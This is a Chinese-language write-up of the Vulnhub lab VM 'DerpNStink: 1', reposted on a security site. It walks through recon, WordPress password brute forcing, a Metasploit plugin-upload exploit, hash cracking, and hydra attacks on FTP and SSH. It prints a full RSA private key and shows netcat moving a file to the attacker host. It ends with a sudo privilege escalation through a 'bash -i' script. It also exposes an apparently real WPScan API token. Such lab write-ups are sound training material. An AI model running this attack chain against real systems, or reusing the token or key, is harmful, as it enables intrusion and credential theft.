Vulnhub DerpNStink: 1

admin
admin
admin
102800
文章
87
评论
2023年10月31日02:03:01评论14 views字数 4366阅读14分33秒阅读模式

0x01 靶机介绍

  • Name: DerpNStink: 1

  • Date release: 9 Feb 2018

  • Author: Bryan Smith

  • Series: DerpNStink

  • Difficulty : Medium

靶机下载地址:

https://www.vulnhub.com/entry/derpnstink-1,221/

0x02 侦查

端口探测

首先使用 nmap 进行端口扫描

nmap -p- -sV -sC -A 192.168.0.106 -oA nmap_DerpNStink-1

Vulnhub DerpNStink: 1

扫描结果显示目标开放了21、22、80端口。

80端口

访问

http://192.168.0.106

为一张图片

Vulnhub DerpNStink: 1

查看源代码并找到第一个flag:

flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

Vulnhub DerpNStink: 1

同时找到一个路径文件

Vulnhub DerpNStink: 1

访问http://192.168.0.106/webnotes/info.txt,出现提示要将更新本地DNS才能访问博客

目录扫描

使用 gobuster 进行目录扫描,成功找到目录temporaryweblog

gobuster dir -u http://192.168.0.106 -w /usr/share/wordlists/dirb/big.txt -x php

Vulnhub DerpNStink: 1

访问http://192.168.0.106/temporary页面如下

Vulnhub DerpNStink: 1

访问weblog目录则自动跳转至http://derpnstink.local/weblog/

0x03 上线[stinky]

WordPress弱口令

对 hosts 文件进行修改完成域名解析

vim /etc/hosts192.168.0.106 derpnstink.local

访问weblog目录为博客界面

Vulnhub DerpNStink: 1

使用的博客模版为 WordPress

Vulnhub DerpNStink: 1

访问wp-admin目录跳转至登录界面

Vulnhub DerpNStink: 1

使用 wpscan 进行漏洞扫描提示存在多个插件漏洞,其中的文件上传危害较大,但需要登录后台才能利用

wpscan --url http://derpnstink.local/weblog  --api-token Rjr3NLjvRw21PbkmvY6h4EI1uqS5wB9lzCpPiLziH3A --detection-mode aggressive -e

Vulnhub DerpNStink: 1

使用 wpscan 对 admin 管理用户进行密码爆破,成功拿到密码admin

wpscan --url http://derpnstink.local/weblog --passwords /usr/share/wordlists/fasttrack.txt

Vulnhub DerpNStink: 1

通过弱口令admin/admin登录管理后台

Vulnhub DerpNStink: 1

文件上传

由于插件slideshowgallery存在文件上传漏洞,使用 MSF 进行漏洞利用

msfconsolemsf > use exploit/unix/webapp/wp_slideshowgallery_uploadmsf > set rhosts derpnstink.localmsf > set targeturi /weblogmsf > set wp_user adminmsf > set wp_password adminmsf > run

Vulnhub DerpNStink: 1

成功返回 meterpreter 并查看目录信息

Vulnhub DerpNStink: 1

/var/www/html/weblog中找到配置文件wp-config.php,其中存在数据库明文密码

Vulnhub DerpNStink: 1

同时在/var/www/html/php中存在info.php,文件注释提示存在 phpmyadmin

Vulnhub DerpNStink: 1

哈希破解

访问http://192.168.0.106/php/phpmyadmin/并通过root/mysql成功登录

Vulnhub DerpNStink: 1

在 wordpress 数据库的 wp_posts 表中发现flag2:

flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6)

Vulnhub DerpNStink: 1

在 wp_users 用户表中发现另一个用户 unclestinky,同时存在密码哈希

Vulnhub DerpNStink: 1

使用 john 对其哈希值进行爆破,成功拿到密码为wedgie57

echo '$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41' > pass.hashjohn pass.hash --wordlist=/usr/share/wordlists/rockyou.txtjohn pass.hash --show

Vulnhub DerpNStink: 1

同时查看系统用户,发现用户 stinky 与 mrderp

cat /etc/passwd | grep /bin/bash

Vulnhub DerpNStink: 1

密码爆破

使用 hydra 以上述用户为字典爆破 FTP 和 SSH 服务,成功在 FTP 服务中发现账号密码stinky/wedgie57

hydra -L user.txt -p wedgie57 192.168.0.106 ssh -f -V hydra -L user.txt -p wedgie57 192.168.0.106 ftp -f -V

Vulnhub DerpNStink: 1

成功登录 FTP 服务

Vulnhub DerpNStink: 1

在其中找到 SSH 私钥:

ftp://192.168.0.106/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh/key.txt
-----BEGIN RSA PRIVATE KEY-----MIIEowIBAAKCAQEAwSaN1OE76mjt64fOpAbKnFyikjz4yV8qYUxki+MjiRPqtDo42xba3Oo78y82svuAHBm6YScUos8dHUCTMLA+ogsmoDaJFghZEtQXugP8flgSk9cOuJzOt9ih/MPmkjzfvDL9oW2Nh1XIctVfTZ6o8ZeJI8Sxh8Eguh+dw69M+Ad0DimnAKDPdL7z7SeWg1BJ1q/oIAtJnv7yJz2iMbZ6xOj6/ZDE/2trrrdbSyMc5CyA09/f5xZ9f1ofSYhiCQ+dp9CTgH/JpKmdsZ21Uus8cbeGk1WpT6B+D8zoNgRxmO3/VyVBLHXaio3hmxshttdFp4bFc3foTTSyJobGoFX+ewIDAQABAoIBACESDdS2H8EZ6CqcnRfehdBR2A/72oj3/1SbdNeys0HkJBppoZR5jE2o2Uzg95ebkiq9iPjbbSAXICADD3CVrJOoHxvtWnloQoADynAyAIhNYhjoCIA5cPdvYwTZMeA2BgS+IkkCbeoPGPv4ZpHuqXR8AqIaKl9ZBNZ5VVTM7fvFVl5afN5eWIZlOTDf++VSDedtR7nL2ggzacNkQ8JCK9mF62wiIHK5Zjs1lns4Ii2kPw+qObdYoaiFnexucvkMSFD7VAdfFUECQIyqYVbsp5tec2N4HdhK/B0V8D4+6u9OuoiDFqbdJJWLFQ55e6kspIWQxM/j6PRGQhL0DeZCLQECgYEA9qUoeblEro6ICqvcrye0ram38XmxAhVIPM7g5QXh58YdB1D6sq6XVGGEaLxypnUbbDnJQ92Do0AtvqCTBx4VnoMNisce++7IyfTSygbZR8LscZQ51ciuQkowz3yp8XMyMw+YkEV5nAw9a4puiecg79rH9WSr4A/XMwHcJ2swloECgYEAyHn7VNG/Nrc4/yeTqfrxzDBdHm+y9nowlWL+PQim9z+j78tlWX/9P8h98gOlADEvOZvcfh1eW0gE4DDyRBeYetBytFc0kzZbcQtd7042/oPmpbW55lzKBnnXkO3BI2bgU9Br7QTsJlcUybZ0MVwgs+Go1Xj7PRisxMSRx8mHbvsCgYBxyLulfBz9Um/cTHDgtTabL0LWucc5KMxMkTwbK92N6U2XBHrDV9wkZ2CIWPejZz8hbH83Ocfy1jbETJvHms9qcxcaQMZAf2ZOFQ3xebtfacNemn0b7RrHJibicaaM5xHvkHBXjlWN8e+b3x8jq2b8gDfjM3A/S8+Bjogb/01JAKBgGfUvbY9eBKHrO6B+fnEre06c1ArO/5qZLVKczD7RTazcF3m81P6dRjO52QsPQ4vay0kK3vqDA+s6lGPKDraGbAqO+5paCKCubN/1qP114fUmuXijCjikAPwoRQ//5MtWiwuu2cj8Ice/PZIGD/kXk+sJXyCz2TiXcD/qh1WpF13AoGBAJG43weOx9gyy1Bo64cBtZ7iPJ9doiZ5Y6UWYNxy3/f2wZ37D99NSndzUBtPqkw0sAptqkjKeNtLCYtHNFJAnE0/uAGoAyX+SHhas0l2IYlUlk8AttcHP1kAa4Id4FlCiJAXl3/ayyrUghuWWA3jMW3JgZdMyhU3OV+wyZz25S8o-----END RSA PRIVATE KEY-----

SSH私钥登录

赋予400权限后使用该私钥登录目标 SSH 服务

chomd 400 key.txtssh -i key.txt stinky@192.168.0.106

Vulnhub DerpNStink: 1

~/Desktop目录中找到第三个flag:

flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)

0x04 权限提升[root]

流量分析

Document目录下发现一个 pcap 文件,尝试将其下载至本地,首先开启 nc 监听

nc -nvlp 1234 > derpissues.pcap

在目标 shell 中传输文件

nc 192.168.0.103 1234 <  derpissues.pcap

打开 WireShark 分析文件,在其中存在三个用户登录数据包,发现 mrderp 密码为 derpderpderpderpderpderpderp

Vulnhub DerpNStink: 1

Vulnhub DerpNStink: 1

Vulnhub DerpNStink: 1

sudo提权

成功登录用户 mrderp 并查看用户权限,发现在/home/mrdrep/binaries目录中运行所有以 derpy 开头的文件都将以 root 权限执行

sudo -l

Vulnhub DerpNStink: 1

创建binaries目录以及用户提权的脚本

mkdir binariescd binariesnano derpy123.sh

脚本内容如下

#!/bin/bashbash -i

利用 sudo 执行成功拿到 root 权限

chomd +x derpy123.shsudo ./derpy123.sh

/root/Desktop下成功拿到第四个flag

Vulnhub DerpNStink: 1

0x05 知识星球

Vulnhub DerpNStink: 1

原文始发于微信公众号(狐狸说安全):Vulnhub DerpNStink: 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年10月31日02:03:01
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub DerpNStink: 1http://cn-sec.com/archives/2159163.html

发表评论

匿名网友 填写信息